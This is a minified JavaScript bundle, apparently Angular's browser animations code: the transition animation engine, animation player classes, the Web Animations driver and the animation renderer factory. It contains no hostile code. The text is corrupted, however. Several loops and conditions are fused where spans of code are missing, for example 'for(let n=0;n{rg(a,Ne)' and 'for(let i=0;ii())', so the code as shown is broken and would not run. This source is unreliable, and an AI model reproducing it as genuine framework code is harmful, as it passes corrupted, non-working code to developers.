i=this.options.params;Object.keys(e).forEach(n=>{null==i[n]&&(i[n]=e[n])})}}}const hy="void",U6=new H6(hy);class wle{constructor(a,e,i){this.id=a,this.hostElement=e,this._engine=i,this.players=[],this._triggers=new Map,this._queue=[],this._elementListeners=new Map,this._hostClassName="ng-tns-"+a,Ad(e,this._hostClassName)}listen(a,e,i,n){if(!this._triggers.has(e))throw function Ece(t,a){return new gi(3302,!1)}();if(null==i||0==i.length)throw function Dce(t){return new gi(3303,!1)}();if(!function kle(t){return"start"==t||"done"==t}(i))throw function xce(t,a){return new gi(3400,!1)}();const r=Gl(this._elementListeners,a,[]),c={name:e,phase:i,callback:n};r.push(c);const d=Gl(this._engine.statesByElement,a,new Map);return d.has(e)||(Ad(a,d4),Ad(a,d4+"-"+e),d.set(e,U6)),()=>{this._engine.afterFlush(()=>{const T=r.indexOf(c);T>=0&&r.splice(T,1),this._triggers.has(e)||d.delete(e)})}}register(a,e){return!this._triggers.has(a)&&(this._triggers.set(a,e),!0)}_getTrigger(a){const e=this._triggers.get(a);if(!e)throw function wce(t){return new gi(3401,!1)}();return e}trigger(a,e,i,n=!0){const r=this._getTrigger(e),c=new q6(this.id,e,a);let d=this._engine.statesByElement.get(a);d||(Ad(a,d4),Ad(a,d4+"-"+e),this._engine.statesByElement.set(a,d=new Map));let T=d.get(e);const k=new H6(i,this.id);if(!(i&&i.hasOwnProperty("value"))&&T&&k.absorbOptions(T.options),d.set(e,k),T||(T=U6),k.value!==hy&&T.value===k.value){if(!function Nle(t,a){const e=Object.keys(t),i=Object.keys(a);if(e.length!=i.length)return!1;for(let n=0;n{rg(a,Ne),cu(a,et)})}return}const te=Gl(this._engine.playersByElement,a,[]);te.forEach(Fe=>{Fe.namespaceId==this.id&&Fe.triggerName==e&&Fe.queued&&Fe.destroy()});let pe=r.matchTransition(T.value,k.value,a,k.params),Re=!1;if(!pe){if(!n)return;pe=r.fallbackTransition,Re=!0}return this._engine.totalQueuedPlayers++,this._queue.push({element:a,triggerName:e,transition:pe,fromState:T,toState:k,player:c,isFallbackTransition:Re}),Re||(Ad(a,AO),c.onStart(()=>{g1(a,AO)})),c.onDone(()=>{let Fe=this.players.indexOf(c);Fe>=0&&this.players.splice(Fe,1);const Ne=this._engine.playersByElement.get(a);if(Ne){let et=Ne.indexOf(c);et>=0&&Ne.splice(et,1)}}),this.players.push(c),te.push(c),c}deregister(a){this._triggers.delete(a),this._engine.statesByElement.forEach(e=>e.delete(a)),this._elementListeners.forEach((e,i)=>{this._elementListeners.set(i,e.filter(n=>n.name!=a))})}clearElementCache(a){this._engine.statesByElement.delete(a),this._elementListeners.delete(a);const e=this._engine.playersByElement.get(a);e&&(e.forEach(i=>i.destroy()),this._engine.playersByElement.delete(a))}_signalRemovalForInnerTriggers(a,e){const i=this._engine.driver.query(a,m4,!0);i.forEach(n=>{if(n[vd])return;const r=this._engine.fetchNamespacesByElement(n);r.size?r.forEach(c=>c.triggerLeaveAnimation(n,e,!1,!0)):this.clearElementCache(n)}),this._engine.afterFlushAnimationsDone(()=>i.forEach(n=>this.clearElementCache(n)))}triggerLeaveAnimation(a,e,i,n){const r=this._engine.statesByElement.get(a),c=new Map;if(r){const d=[];if(r.forEach((T,k)=>{if(c.set(k,T.value),this._triggers.has(k)){const q=this.trigger(a,k,hy,n);q&&d.push(q)}}),d.length)return this._engine.markElementAsRemoved(this.id,a,!0,e,c),i&&ep(d).onDone(()=>this._engine.processLeaveNode(a)),!0}return!1}prepareLeaveAnimationListeners(a){const e=this._elementListeners.get(a),i=this._engine.statesByElement.get(a);if(e&&i){const n=new Set;e.forEach(r=>{const c=r.name;if(n.has(c))return;n.add(c);const T=this._triggers.get(c).fallbackTransition,k=i.get(c)||U6,q=new H6(hy),Y=new q6(this.id,c,a);this._engine.totalQueuedPlayers++,this._queue.push({element:a,triggerName:c,transition:T,fromState:k,toState:q,player:Y,isFallbackTransition:!0})})}}removeNode(a,e){const i=this._engine;if(a.childElementCount&&this._signalRemovalForInnerTriggers(a,e),this.triggerLeaveAnimation(a,e,!0))return;let n=!1;if(i.totalAnimations){const r=i.players.length?i.playersByQueriedElement.get(a):[];if(r&&r.length)n=!0;else{let c=a;for(;c=c.parentNode;)if(i.statesByElement.get(c)){n=!0;break}}}if(this.prepareLeaveAnimationListeners(a),n)i.markElementAsRemoved(this.id,a,!1,e);else{const r=a[vd];(!r||r===TO)&&(i.afterFlush(()=>this.clearElementCache(a)),i.destroyInnerAnimations(a),i._onRemovalComplete(a,e))}}insertNode(a,e){Ad(a,this._hostClassName)}drainQueuedTransitions(a){const e=[];return this._queue.forEach(i=>{const n=i.player;if(n.destroyed)return;const r=i.element,c=this._elementListeners.get(r);c&&c.forEach(d=>{if(d.name==i.triggerName){const T=E6(r,i.triggerName,i.fromState.value,i.toState.value);T._data=a,A6(i.player,d.phase,T,d.callback)}}),n.markedForDestroy?this._engine.afterFlush(()=>{n.destroy()}):e.push(i)}),this._queue=[],e.sort((i,n)=>{const r=i.transition.ast.depCount,c=n.transition.ast.depCount;return 0==r||0==c?r-c:this._engine.driver.containsElement(i.element,n.element)?1:-1})}destroy(a){this.players.forEach(e=>e.destroy()),this._signalRemovalForInnerTriggers(this.hostElement,a)}elementContainsData(a){let e=!1;return this._elementListeners.has(a)&&(e=!0),e=!!this._queue.find(i=>i.element===a)||e,e}}class Ile{constructor(a,e,i){this.bodyNode=a,this.driver=e,this._normalizer=i,this.players=[],this.newHostElements=new Map,this.playersByElement=new Map,this.playersByQueriedElement=new Map,this.statesByElement=new Map,this.disabledNodes=new Set,this.totalAnimations=0,this.totalQueuedPlayers=0,this._namespaceLookup={},this._namespaceList=[],this._flushFns=[],this._whenQuietFns=[],this.namespacesByHostElement=new Map,this.collectedEnterElements=[],this.collectedLeaveElements=[],this.onRemovalComplete=(n,r)=>{}}_onRemovalComplete(a,e){this.onRemovalComplete(a,e)}get queuedPlayers(){const a=[];return this._namespaceList.forEach(e=>{e.players.forEach(i=>{i.queued&&a.push(i)})}),a}createNamespace(a,e){const i=new wle(a,e,this);return this.bodyNode&&this.driver.containsElement(this.bodyNode,e)?this._balanceNamespaceList(i,e):(this.newHostElements.set(e,i),this.collectEnterElement(e)),this._namespaceLookup[a]=i}_balanceNamespaceList(a,e){const i=this._namespaceList,n=this.namespacesByHostElement;if(i.length-1>=0){let c=!1,d=this.driver.getParentElement(e);for(;d;){const T=n.get(d);if(T){const k=i.indexOf(T);i.splice(k+1,0,a),c=!0;break}d=this.driver.getParentElement(d)}c||i.unshift(a)}else i.push(a);return n.set(e,a),a}register(a,e){let i=this._namespaceLookup[a];return i||(i=this.createNamespace(a,e)),i}registerTrigger(a,e,i){let n=this._namespaceLookup[a];n&&n.register(e,i)&&this.totalAnimations++}destroy(a,e){if(!a)return;const i=this._fetchNamespace(a);this.afterFlush(()=>{this.namespacesByHostElement.delete(i.hostElement),delete this._namespaceLookup[a];const n=this._namespaceList.indexOf(i);n>=0&&this._namespaceList.splice(n,1)}),this.afterFlushAnimationsDone(()=>i.destroy(e))}_fetchNamespace(a){return this._namespaceLookup[a]}fetchNamespacesByElement(a){const e=new Set,i=this.statesByElement.get(a);if(i)for(let n of i.values())if(n.namespaceId){const r=this._fetchNamespace(n.namespaceId);r&&e.add(r)}return e}trigger(a,e,i,n){if(v4(e)){const r=this._fetchNamespace(a);if(r)return r.trigger(e,i,n),!0}return!1}insertNode(a,e,i,n){if(!v4(e))return;const r=e[vd];if(r&&r.setForRemoval){r.setForRemoval=!1,r.setForMove=!0;const c=this.collectedLeaveElements.indexOf(e);c>=0&&this.collectedLeaveElements.splice(c,1)}if(a){const c=this._fetchNamespace(a);c&&c.insertNode(e,i)}n&&this.collectEnterElement(e)}collectEnterElement(a){this.collectedEnterElements.push(a)}markElementAsDisabled(a,e){e?this.disabledNodes.has(a)||(this.disabledNodes.add(a),Ad(a,B6)):this.disabledNodes.has(a)&&(this.disabledNodes.delete(a),g1(a,B6))}removeNode(a,e,i,n){if(v4(e)){const r=a?this._fetchNamespace(a):null;if(r?r.removeNode(e,n):this.markElementAsRemoved(a,e,!1,n),i){const c=this.namespacesByHostElement.get(e);c&&c.id!==a&&c.removeNode(e,n)}}else this._onRemovalComplete(e,n)}markElementAsRemoved(a,e,i,n,r){this.collectedLeaveElements.push(e),e[vd]={namespaceId:a,setForRemoval:n,hasAnimation:i,removedBeforeQueried:!1,previousTriggersValues:r}}listen(a,e,i,n,r){return v4(e)?this._fetchNamespace(a).listen(e,i,n,r):()=>{}}_buildInstruction(a,e,i,n,r){return a.transition.build(this.driver,a.element,a.fromState.value,a.toState.value,i,n,a.fromState.options,a.toState.options,e,r)}destroyInnerAnimations(a){let e=this.driver.query(a,m4,!0);e.forEach(i=>this.destroyActiveAnimationsForElement(i)),0!=this.playersByQueriedElement.size&&(e=this.driver.query(a,R6,!0),e.forEach(i=>this.finishActiveQueriedAnimationOnElement(i)))}destroyActiveAnimationsForElement(a){const e=this.playersByElement.get(a);e&&e.forEach(i=>{i.queued?i.markedForDestroy=!0:i.destroy()})}finishActiveQueriedAnimationOnElement(a){const e=this.playersByQueriedElement.get(a);e&&e.forEach(i=>i.finish())}whenRenderingDone(){return new Promise(a=>{if(this.players.length)return ep(this.players).onDone(()=>a());a()})}processLeaveNode(a){var e;const i=a[vd];if(i&&i.setForRemoval){if(a[vd]=TO,i.namespaceId){this.destroyInnerAnimations(a);const n=this._fetchNamespace(i.namespaceId);n&&n.clearElementCache(a)}this._onRemovalComplete(a,i.setForRemoval)}!(null===(e=a.classList)||void 0===e)&&e.contains(B6)&&this.markElementAsDisabled(a,!1),this.driver.query(a,".ng-animate-disabled",!0).forEach(n=>{this.markElementAsDisabled(n,!1)})}flush(a=-1){let e=[];if(this.newHostElements.size&&(this.newHostElements.forEach((i,n)=>this._balanceNamespaceList(i,n)),this.newHostElements.clear()),this.totalAnimations&&this.collectedEnterElements.length)for(let i=0;ii()),this._flushFns=[],this._whenQuietFns.length){const i=this._whenQuietFns;this._whenQuietFns=[],e.length?ep(e).onDone(()=>{i.forEach(n=>n())}):i.forEach(n=>n())}}reportError(a){throw function Ice(t){return new gi(3402,!1)}()}_flushAnimations(a,e){const i=new y4,n=[],r=new Map,c=[],d=new Map,T=new Map,k=new Map,q=new Set;this.disabledNodes.forEach(Di=>{q.add(Di);const Pi=this.driver.query(Di,".ng-animate-queued",!0);for(let Oi=0;Oi{const Oi=I6+Fe++;Re.set(Pi,Oi),Di.forEach($i=>Ad($i,Oi))});const Ne=[],et=new Set,ut=new Set;for(let Di=0;Diet.add($i)):ut.add(Pi))}const Ze=new Map,yt=xO(te,Array.from(et));yt.forEach((Di,Pi)=>{const Oi=l4+Fe++;Ze.set(Pi,Oi),Di.forEach($i=>Ad($i,Oi))}),a.push(()=>{pe.forEach((Di,Pi)=>{const Oi=Re.get(Pi);Di.forEach($i=>g1($i,Oi))}),yt.forEach((Di,Pi)=>{const Oi=Ze.get(Pi);Di.forEach($i=>g1($i,Oi))}),Ne.forEach(Di=>{this.processLeaveNode(Di)})});const It=[],St=[];for(let Di=this._namespaceList.length-1;Di>=0;Di--)this._namespaceList[Di].drainQueuedTransitions(e).forEach(Oi=>{const $i=Oi.player,Na=Oi.element;if(It.push($i),this.collectedEnterElements.length){const bn=Na[vd];if(bn&&bn.setForMove){if(bn.previousTriggersValues&&bn.previousTriggersValues.has(Oi.triggerName)){const Xr=bn.previousTriggersValues.get(Oi.triggerName),Li=this.statesByElement.get(Oi.element);if(Li&&Li.has(Oi.triggerName)){const Fa=Li.get(Oi.triggerName);Fa.value=Xr,Li.set(Oi.triggerName,Fa)}}return void $i.destroy()}}const jn=!Y||!this.driver.containsElement(Y,Na),yn=Ze.get(Na),Kr=Re.get(Na),to=this._buildInstruction(Oi,i,Kr,yn,jn);if(to.errors&&to.errors.length)return void St.push(to);if(jn)return $i.onStart(()=>rg(Na,to.fromStyles)),$i.onDestroy(()=>cu(Na,to.toStyles)),void n.push($i);if(Oi.isFallbackTransition)return $i.onStart(()=>rg(Na,to.fromStyles)),$i.onDestroy(()=>cu(Na,to.toStyles)),void n.push($i);const ol=[];to.timelines.forEach(bn=>{bn.stretchStartingKeyframe=!0,this.disabledNodes.has(bn.element)||ol.push(bn)}),to.timelines=ol,i.append(Na,to.timelines),c.push({instruction:to,player:$i,element:Na}),to.queriedElements.forEach(bn=>Gl(d,bn,[]).push($i)),to.preStyleProps.forEach((bn,Xr)=>{if(bn.size){let Li=T.get(Xr);Li||T.set(Xr,Li=new Set),bn.forEach((Fa,Fn)=>Li.add(Fn))}}),to.postStyleProps.forEach((bn,Xr)=>{let Li=k.get(Xr);Li||k.set(Xr,Li=new Set),bn.forEach((Fa,Fn)=>Li.add(Fn))})});if(St.length){const Di=[];St.forEach(Pi=>{Di.push(function Rce(t,a){return new gi(3505,!1)}())}),It.forEach(Pi=>Pi.destroy()),this.reportError(Di)}const Nt=new Map,oi=new Map;c.forEach(Di=>{const Pi=Di.element;i.has(Pi)&&(oi.set(Pi,Pi),this._beforeAnimationBuild(Di.player.namespaceId,Di.instruction,Nt))}),n.forEach(Di=>{const Pi=Di.element;this._getPreviousPlayers(Pi,!1,Di.namespaceId,Di.triggerName,null).forEach($i=>{Gl(Nt,Pi,[]).push($i),$i.destroy()})});const Ai=Ne.filter(Di=>IO(Di,T,k)),vi=new Map;DO(vi,this.driver,ut,k,wh).forEach(Di=>{IO(Di,T,k)&&Ai.push(Di)});const Za=new Map;pe.forEach((Di,Pi)=>{DO(Za,this.driver,new Set(Di),T,"!")}),Ai.forEach(Di=>{var Pi,Oi;const $i=vi.get(Di),Na=Za.get(Di);vi.set(Di,new Map([...Array.from(null!==(Pi=null==$i?void 0:$i.entries())&&void 0!==Pi?Pi:[]),...Array.from(null!==(Oi=null==Na?void 0:Na.entries())&&void 0!==Oi?Oi:[])]))});const wa=[],en=[],Vo={};c.forEach(Di=>{const{element:Pi,player:Oi,instruction:$i}=Di;if(i.has(Pi)){if(q.has(Pi))return Oi.onDestroy(()=>cu(Pi,$i.toStyles)),Oi.disabled=!0,Oi.overrideTotalTime($i.totalTime),void n.push(Oi);let Na=Vo;if(oi.size>1){let yn=Pi;const Kr=[];for(;yn=yn.parentNode;){const to=oi.get(yn);if(to){Na=to;break}Kr.push(yn)}Kr.forEach(to=>oi.set(to,Na))}const jn=this._buildAnimation(Oi.namespaceId,$i,Nt,r,Za,vi);if(Oi.setRealPlayer(jn),Na===Vo)wa.push(Oi);else{const yn=this.playersByElement.get(Na);yn&&yn.length&&(Oi.parentPlayer=ep(yn)),n.push(Oi)}}else rg(Pi,$i.fromStyles),Oi.onDestroy(()=>cu(Pi,$i.toStyles)),en.push(Oi),q.has(Pi)&&n.push(Oi)}),en.forEach(Di=>{const Pi=r.get(Di.element);if(Pi&&Pi.length){const Oi=ep(Pi);Di.setRealPlayer(Oi)}}),n.forEach(Di=>{Di.parentPlayer?Di.syncPlayerEvents(Di.parentPlayer):Di.destroy()});for(let Di=0;Di!jn.destroyed);Na.length?Ple(this,Pi,Na):this.processLeaveNode(Pi)}return Ne.length=0,wa.forEach(Di=>{this.players.push(Di),Di.onDone(()=>{Di.destroy();const Pi=this.players.indexOf(Di);this.players.splice(Pi,1)}),Di.play()}),wa}elementContainsData(a,e){let i=!1;const n=e[vd];return n&&n.setForRemoval&&(i=!0),this.playersByElement.has(e)&&(i=!0),this.playersByQueriedElement.has(e)&&(i=!0),this.statesByElement.has(e)&&(i=!0),this._fetchNamespace(a).elementContainsData(e)||i}afterFlush(a){this._flushFns.push(a)}afterFlushAnimationsDone(a){this._whenQuietFns.push(a)}_getPreviousPlayers(a,e,i,n,r){let c=[];if(e){const d=this.playersByQueriedElement.get(a);d&&(c=d)}else{const d=this.playersByElement.get(a);if(d){const T=!r||r==hy;d.forEach(k=>{k.queued||!T&&k.triggerName!=n||c.push(k)})}}return(i||n)&&(c=c.filter(d=>!(i&&i!=d.namespaceId||n&&n!=d.triggerName))),c}_beforeAnimationBuild(a,e,i){const r=e.element,c=e.isRemovalTransition?void 0:a,d=e.isRemovalTransition?void 0:e.triggerName;for(const T of e.timelines){const k=T.element,q=k!==r,Y=Gl(i,k,[]);this._getPreviousPlayers(k,q,c,d,e.toState).forEach(pe=>{const Re=pe.getRealPlayer();Re.beforeDestroy&&Re.beforeDestroy(),pe.destroy(),Y.push(pe)})}rg(r,e.fromStyles)}_buildAnimation(a,e,i,n,r,c){const d=e.triggerName,T=e.element,k=[],q=new Set,Y=new Set,te=e.timelines.map(Re=>{const Fe=Re.element;q.add(Fe);const Ne=Fe[vd];if(Ne&&Ne.removedBeforeQueried)return new ly(Re.duration,Re.delay);const et=Fe!==T,ut=function Ole(t){const a=[];return wO(t,a),a}((i.get(Fe)||Dle).map(Nt=>Nt.getRealPlayer())).filter(Nt=>!!Nt.element&&Nt.element===Fe),Ze=r.get(Fe),yt=c.get(Fe),It=eO(0,this._normalizer,0,Re.keyframes,Ze,yt),St=this._buildPlayer(Re,It,ut);if(Re.subTimeline&&n&&Y.add(Fe),et){const Nt=new q6(a,d,Fe);Nt.setRealPlayer(St),k.push(Nt)}return St});k.forEach(Re=>{Gl(this.playersByQueriedElement,Re.element,[]).push(Re),Re.onDone(()=>function Rle(t,a,e){let i=t.get(a);if(i){if(i.length){const n=i.indexOf(e);i.splice(n,1)}0==i.length&&t.delete(a)}return i}(this.playersByQueriedElement,Re.element,Re))}),q.forEach(Re=>Ad(Re,lO));const pe=ep(te);return pe.onDestroy(()=>{q.forEach(Re=>g1(Re,lO)),cu(T,e.toStyles)}),Y.forEach(Re=>{Gl(n,Re,[]).push(pe)}),pe}_buildPlayer(a,e,i){return e.length>0?this.driver.animate(a.element,e,a.duration,a.delay,a.easing,i):new ly(a.duration,a.delay)}}class q6{constructor(a,e,i){this.namespaceId=a,this.triggerName=e,this.element=i,this._player=new ly,this._containsRealPlayer=!1,this._queuedCallbacks=new Map,this.destroyed=!1,this.markedForDestroy=!1,this.disabled=!1,this.queued=!0,this.totalTime=0}setRealPlayer(a){this._containsRealPlayer||(this._player=a,this._queuedCallbacks.forEach((e,i)=>{e.forEach(n=>A6(a,i,void 0,n))}),this._queuedCallbacks.clear(),this._containsRealPlayer=!0,this.overrideTotalTime(a.totalTime),this.queued=!1)}getRealPlayer(){return this._player}overrideTotalTime(a){this.totalTime=a}syncPlayerEvents(a){const e=this._player;e.triggerCallback&&a.onStart(()=>e.triggerCallback("start")),a.onDone(()=>this.finish()),a.onDestroy(()=>this.destroy())}_queueEvent(a,e){Gl(this._queuedCallbacks,a,[]).push(e)}onDone(a){this.queued&&this._queueEvent("done",a),this._player.onDone(a)}onStart(a){this.queued&&this._queueEvent("start",a),this._player.onStart(a)}onDestroy(a){this.queued&&this._queueEvent("destroy",a),this._player.onDestroy(a)}init(){this._player.init()}hasStarted(){return!this.queued&&this._player.hasStarted()}play(){!this.queued&&this._player.play()}pause(){!this.queued&&this._player.pause()}restart(){!this.queued&&this._player.restart()}finish(){this._player.finish()}destroy(){this.destroyed=!0,this._player.destroy()}reset(){!this.queued&&this._player.reset()}setPosition(a){this.queued||this._player.setPosition(a)}getPosition(){return this.queued?0:this._player.getPosition()}triggerCallback(a){const e=this._player;e.triggerCallback&&e.triggerCallback(a)}}function v4(t){return t&&1===t.nodeType}function EO(t,a){const e=t.style.display;return t.style.display=null!=a?a:"none",e}function DO(t,a,e,i,n){const r=[];e.forEach(T=>r.push(EO(T)));const c=[];i.forEach((T,k)=>{const q=new Map;T.forEach(Y=>{const te=a.computeStyle(k,Y,n);q.set(Y,te),(!te||0==te.length)&&(k[vd]=xle,c.push(k))}),t.set(k,q)});let d=0;return e.forEach(T=>EO(T,r[d++])),c}function xO(t,a){const e=new Map;if(t.forEach(d=>e.set(d,[])),0==a.length)return e;const n=new Set(a),r=new Map;function c(d){if(!d)return 1;let T=r.get(d);if(T)return T;const k=d.parentNode;return T=e.has(k)?k:n.has(k)?1:c(k),r.set(d,T),T}return a.forEach(d=>{const T=c(d);1!==T&&e.get(T).push(d)}),e}function Ad(t,a){var e;null===(e=t.classList)||void 0===e||e.add(a)}function g1(t,a){var e;null===(e=t.classList)||void 0===e||e.remove(a)}function Ple(t,a,e){ep(e).onDone(()=>t.processLeaveNode(a))}function wO(t,a){for(let e=0;en.add(r)):a.set(t,i),e.delete(t),!0}class A4{constructor(a,e,i){this.bodyNode=a,this._driver=e,this._normalizer=i,this._triggerCache={},this.onRemovalComplete=(n,r)=>{},this._transitionEngine=new Ile(a,e,i),this._timelineEngine=new Mle(a,e,i),this._transitionEngine.onRemovalComplete=(n,r)=>this.onRemovalComplete(n,r)}registerTrigger(a,e,i,n,r){const c=a+"-"+n;let d=this._triggerCache[c];if(!d){const T=[],q=O6(this._driver,r,T,[]);if(T.length)throw function yce(t,a){return new gi(3404,!1)}();d=function gle(t,a,e){return new Cle(t,a,e)}(n,q,this._normalizer),this._triggerCache[c]=d}this._transitionEngine.registerTrigger(e,n,d)}register(a,e){this._transitionEngine.register(a,e)}destroy(a,e){this._transitionEngine.destroy(a,e)}onInsert(a,e,i,n){this._transitionEngine.insertNode(a,e,i,n)}onRemove(a,e,i,n){this._transitionEngine.removeNode(a,e,n||!1,i)}disableAnimations(a,e){this._transitionEngine.markElementAsDisabled(a,e)}process(a,e,i,n){if("@"==i.charAt(0)){const[r,c]=tO(i);this._timelineEngine.command(r,e,c,n)}else this._transitionEngine.trigger(a,e,i,n)}listen(a,e,i,n,r){if("@"==i.charAt(0)){const[c,d]=tO(i);return this._timelineEngine.listen(c,e,d,r)}return this._transitionEngine.listen(a,e,i,n,r)}flush(a=-1){this._transitionEngine.flush(a)}get players(){return this._transitionEngine.players.concat(this._timelineEngine.players)}whenRenderingDone(){return this._transitionEngine.whenRenderingDone()}}let zle=(()=>{class t{constructor(e,i,n){this._element=e,this._startStyles=i,this._endStyles=n,this._state=0;let r=t.initialStylesByElement.get(e);r||t.initialStylesByElement.set(e,r=new Map),this._initialStyles=r}start(){this._state<1&&(this._startStyles&&cu(this._element,this._startStyles,this._initialStyles),this._state=1)}finish(){this.start(),this._state<2&&(cu(this._element,this._initialStyles),this._endStyles&&(cu(this._element,this._endStyles),this._endStyles=null),this._state=1)}destroy(){this.finish(),this._state<3&&(t.initialStylesByElement.delete(this._element),this._startStyles&&(rg(this._element,this._startStyles),this._endStyles=null),this._endStyles&&(rg(this._element,this._endStyles),this._endStyles=null),cu(this._element,this._initialStyles),this._state=3)}}return t.initialStylesByElement=new WeakMap,t})();function G6(t){let a=null;return t.forEach((e,i)=>{(function Wle(t){return"display"===t||"position"===t})(i)&&(a=a||new Map,a.set(i,e))}),a}class RO{constructor(a,e,i,n){this.element=a,this.keyframes=e,this.options=i,this._specialStyles=n,this._onDoneFns=[],this._onStartFns=[],this._onDestroyFns=[],this._initialized=!1,this._finished=!1,this._started=!1,this._destroyed=!1,this._originalOnDoneFns=[],this._originalOnStartFns=[],this.time=0,this.parentPlayer=null,this.currentSnapshot=new Map,this._duration=i.duration,this._delay=i.delay||0,this.time=this._duration+this._delay}_onFinish(){this._finished||(this._finished=!0,this._onDoneFns.forEach(a=>a()),this._onDoneFns=[])}init(){this._buildPlayer(),this._preparePlayerBeforeStart()}_buildPlayer(){if(this._initialized)return;this._initialized=!0;const a=this.keyframes;this.domPlayer=this._triggerWebAnimation(this.element,a,this.options),this._finalKeyframe=a.length?a[a.length-1]:new Map,this.domPlayer.addEventListener("finish",()=>this._onFinish())}_preparePlayerBeforeStart(){this._delay?this._resetDomPlayerState():this.domPlayer.pause()}_convertKeyframesToObject(a){const e=[];return a.forEach(i=>{e.push(Object.fromEntries(i))}),e}_triggerWebAnimation(a,e,i){return a.animate(this._convertKeyframesToObject(e),i)}onStart(a){this._originalOnStartFns.push(a),this._onStartFns.push(a)}onDone(a){this._originalOnDoneFns.push(a),this._onDoneFns.push(a)}onDestroy(a){this._onDestroyFns.push(a)}play(){this._buildPlayer(),this.hasStarted()||(this._onStartFns.forEach(a=>a()),this._onStartFns=[],this._started=!0,this._specialStyles&&this._specialStyles.start()),this.domPlayer.play()}pause(){this.init(),this.domPlayer.pause()}finish(){this.init(),this._specialStyles&&this._specialStyles.finish(),this._onFinish(),this.domPlayer.finish()}reset(){this._resetDomPlayerState(),this._destroyed=!1,this._finished=!1,this._started=!1,this._onStartFns=this._originalOnStartFns,this._onDoneFns=this._originalOnDoneFns}_resetDomPlayerState(){this.domPlayer&&this.domPlayer.cancel()}restart(){this.reset(),this.play()}hasStarted(){return this._started}destroy(){this._destroyed||(this._destroyed=!0,this._resetDomPlayerState(),this._onFinish(),this._specialStyles&&this._specialStyles.destroy(),this._onDestroyFns.forEach(a=>a()),this._onDestroyFns=[])}setPosition(a){void 0===this.domPlayer&&this.init(),this.domPlayer.currentTime=a*this.time}getPosition(){return this.domPlayer.currentTime/this.time}get totalTime(){return this._delay+this._duration}beforeDestroy(){const a=new Map;this.hasStarted()&&this._finalKeyframe.forEach((i,n)=>{"offset"!==n&&a.set(n,this._finished?i:pO(this.element,n))}),this.currentSnapshot=a}triggerCallback(a){const e="start"===a?this._onStartFns:this._onDoneFns;e.forEach(i=>i()),e.length=0}}class Fle{validateStyleProperty(a){return!0}validateAnimatableStyleProperty(a){return!0}matchesElement(a,e){return!1}containsElement(a,e){return oO(a,e)}getParentElement(a){return x6(a)}query(a,e,i){return rO(a,e,i)}computeStyle(a,e,i){return window.getComputedStyle(a)[e]}animate(a,e,i,n,r,c=[]){const T={duration:i,delay:n,fill:0==n?"both":"forwards"};r&&(T.easing=r);const k=new Map,q=c.filter(pe=>pe instanceof RO);(function Uce(t,a){return 0===t||0===a})(i,n)&&q.forEach(pe=>{pe.currentSnapshot.forEach((Re,Fe)=>k.set(Fe,Re))});let Y=function Fce(t){return t.length?t[0]instanceof Map?t:t.map(a=>dO(a)):[]}(e).map(pe=>tp(pe));Y=function qce(t,a,e){if(e.size&&a.length){let i=a[0],n=[];if(e.forEach((r,c)=>{i.has(c)||n.push(c),i.set(c,r)}),n.length)for(let r=1;rc.set(d,pO(t,d)))}}return a}(a,Y,k);const te=function Lle(t,a){let e=null,i=null;return Array.isArray(a)&&a.length?(e=G6(a[0]),a.length>1&&(i=G6(a[a.length-1]))):a instanceof Map&&(e=G6(a)),e||i?new zle(t,e,i):null}(a,Y);return new RO(a,Y,T,te)}}let Vle=(()=>{class t extends QP{constructor(e,i){super(),this._nextAnimationId=0,this._renderer=e.createRenderer(i.body,{id:"0",encapsulation:dc.None,styles:[],data:{animation:[]}})}build(e){const i=this._nextAnimationId.toString();this._nextAnimationId++;const n=Array.isArray(e)?KP(e):e;return SO(this._renderer,null,i,"register",[n]),new Ble(i,this._renderer)}}return t.\u0275fac=function(e){return new(e||t)(At(qs),At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();class Ble extends class Yse{}{constructor(a,e){super(),this._id=a,this._renderer=e}create(a,e){return new Hle(this._id,a,e||{},this._renderer)}}class Hle{constructor(a,e,i,n){this.id=a,this.element=e,this._renderer=n,this.parentPlayer=null,this._started=!1,this.totalTime=0,this._command("create",i)}_listen(a,e){return this._renderer.listen(this.element,`@@${this.id}:${a}`,e)}_command(a,...e){return SO(this._renderer,this.element,this.id,a,e)}onDone(a){this._listen("done",a)}onStart(a){this._listen("start",a)}onDestroy(a){this._listen("destroy",a)}init(){this._command("init")}hasStarted(){return this._started}play(){this._command("play"),this._started=!0}pause(){this._command("pause")}restart(){this._command("restart")}finish(){this._command("finish")}destroy(){this._command("destroy")}reset(){this._command("reset"),this._started=!1}setPosition(a){this._command("setPosition",a)}getPosition(){var a,e;return null!==(e=null===(a=this._renderer.engine.players[+this.id])||void 0===a?void 0:a.getPosition())&&void 0!==e?e:0}}function SO(t,a,e,i,n){return t.setProperty(a,`@@${e}:${i}`,n)}const kO="@.disabled";let Ule=(()=>{class t{constructor(e,i,n){this.delegate=e,this.engine=i,this._zone=n,this._currentId=0,this._microtaskId=1,this._animationCallbacksBuffer=[],this._rendererCache=new Map,this._cdRecurDepth=0,this.promise=Promise.resolve(0),i.onRemovalComplete=(r,c)=>{const d=null==c?void 0:c.parentNode(r);d&&c.removeChild(d,r)}}createRenderer(e,i){const r=this.delegate.createRenderer(e,i);if(!(e&&i&&i.data&&i.data.animation)){let q=this._rendererCache.get(r);return q||(q=new PO("",r,this.engine),this._rendererCache.set(r,q)),q}const c=i.id,d=i.id+"-"+this._currentId;this._currentId++,this.engine.register(d,e);const T=q=>{Array.isArray(q)?q.forEach(T):this.engine.registerTrigger(c,d,e,q.name,q)};return i.data.animation.forEach(T),new qle(this,d,r,this.engine)}begin(){this._cdRecurDepth++,this.delegate.begin&&this.delegate.begin()}_scheduleCountTask(){this.promise.then(()=>{this._microtaskId++})}scheduleListenerCallback(e,i,n){e>=0&&ei(n)):(0==this._animationCallbacksBuffer.length&&Promise.resolve(null).then(()=>{this._zone.run(()=>{this._animationCallbacksBuffer.forEach(r=>{const[c,d]=r;c(d)}),this._animationCallbacksBuffer=[]})}),this._animationCallbacksBuffer.push([i,n]))}end(){this._cdRecurDepth--,0==this._cdRecurDepth&&this._zone.runOutsideAngular(()=>{this._scheduleCountTask(),this.engine.flush(this._microtaskId)}),this.delegate.end&&this.delegate.end()}whenRenderingDone(){return this.engine.whenRenderingDone()}}return t.\u0275fac=function(e){return new(e||t)(At(qs),At(A4),At(qi))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();class PO{constructor(a,e,i){this.namespaceId=a,this.delegate=e,this.engine=i,this.destroyNode=this.delegate.destroyNode?n=>e.destroyNode(n):null}get data(){return this.delegate.data}destroy(){this.engine.destroy(this.namespaceId,this.delegate),this.delegate.destroy()}createElement(a,e){return 